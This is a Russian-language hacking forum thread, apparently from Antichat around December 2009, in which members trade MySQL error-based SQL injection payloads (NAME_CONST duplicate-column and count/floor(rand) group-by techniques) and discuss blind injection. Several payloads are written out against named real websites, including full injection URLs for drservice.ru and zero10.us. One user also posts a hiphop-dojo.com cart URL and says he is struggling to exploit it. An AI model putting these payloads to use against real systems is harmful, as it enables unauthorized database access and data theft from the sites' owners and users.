31.12.2009, 02:02
|
|
Новичок
Регистрация: 30.10.2009
Сообщений: 21
С нами:
8700457
Репутация:
24
|
|
character=12589)+and+1=(select+*+from(select+*+fro m(select+name_const((version()),14)d)+as+t+join+(s elect+name_const((version()),14)e)b)a)--+
Не совсем понял как работает эта inj (
|
|
|
29.12.2009, 11:09
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
v1d0qz
http://www.drservice.ru/service-centers/nn/NNovgorod/drservice52/'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)--'
|
|
|
|
29.12.2009, 16:11
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
29.12.2009, 16:56
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
сорри но там нету решение как в\обойти если не выводится инфо с колонок
пример:
(%53elect+top+1+Post_count+from+Total)--
всегда ответ одинаковый
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
|
|
|
|
01.01.2010, 15:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от Strilo4ka
Почему то не получаеться! Может у кого нить получиться:
Ошибка: .
у тебя в запросе сразу 2 ошибки: конечный подзапрос возвращает 2 пустых поля, из-за этого в первом подзапросе 1=(select * ... ) используются 2 колонки
квазар составил длинный пример на основе предыдущего способа вывода имен колонок, но его можно записать и покороче:
http://zero10.us/m.php?id=2435+or(1,2)=(select*from(select+name_con st(version(),1),name_const(version(),1))a)
а ещё лучше переходить на другой способ:
http://zero10.us/m.php?id=2435+or(1,2)=(select+count(*),concat(vers ion(),floor(rand(0)*2))from(information_schema.tab les)+group+by+2)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
29.12.2009, 19:01
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
jokester
Так и знал что там можно всё через дупликат красиво оформить.
Сообщение от v1d0qz
Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1=1='2/
Сообщение от Bramin
да не хрена там не выводится и не будет т.к это бред то что ты пишешь.
читай http://forum.antichat.ru/thread19844.html
Ой сорри, было очень поздно, на втыке написал)
там должно было быть
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1='2/
Вы главное не нервничайте, всё будет хорошо 
Последний раз редактировалось v1d0qz; 18.04.2010 в 13:47..
|
|
|
|
30.12.2009, 14:34
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от Strilo4ka
Qwazar Спасиба огромное... Вот почитал пост тут . Прикольно под все ветки ну ты мозг  . Мне тока одно интересно. Чтоб такая ошибка в браузере вывелась, то должен быть вывод ошибок СУБД а обычно кодера это делают когда отлаживают приложение а потом убирают, хоть и вывод ошибок не подавлен или подавлен(в хтаксесс, в пхп ини, в конф апача, в скрипте во время выполнения это роль не имеет)...
В смысле должно быть после mysql_query, допустим или mysql_fetch_assoc или других подобных функций
что то такого типо Если после ,например, mysql_fetch_assoc то и пути могут появиться!!!
Тоесть метод работает не у всех блиндах , тоже самое касаеться и ExtractValue и select 1 union select 2 и тому подобных, и определения колонок если не null...
Условия:
1) сообщения от СУБД для всех етих методов (которые обычно убирают после отладки)
Я прав???
Не полностью.На то она и блин,что вывода нет.Чаще всего и вывода ошибок нет,просто белый экран например,но это для нас тоже ошибка! С помощью if() мы чтото сравниваем,и если есть данные - тру,булеый экран - фалсе.
|
|
|
|
30.12.2009, 14:41
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Strilo4ka
я это знаю я за методы кавазара , дмитрия евтеева там должен быть. Ну так то понятно если нет принтабельных полей то можно логикой работатать все же блинд есть...
Ну да, там должно быть что нибудь типа or die(mysql_error())
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
29.12.2009, 17:37
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
YuNi|[c, там в целом речь о MySQL.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
29.12.2009, 22:57
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
С нами:
10695206
Репутация:
245
|
|
Не могу раскрутить скуль
https://hiphop-dojo.com/order/cart.php?id=939'
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
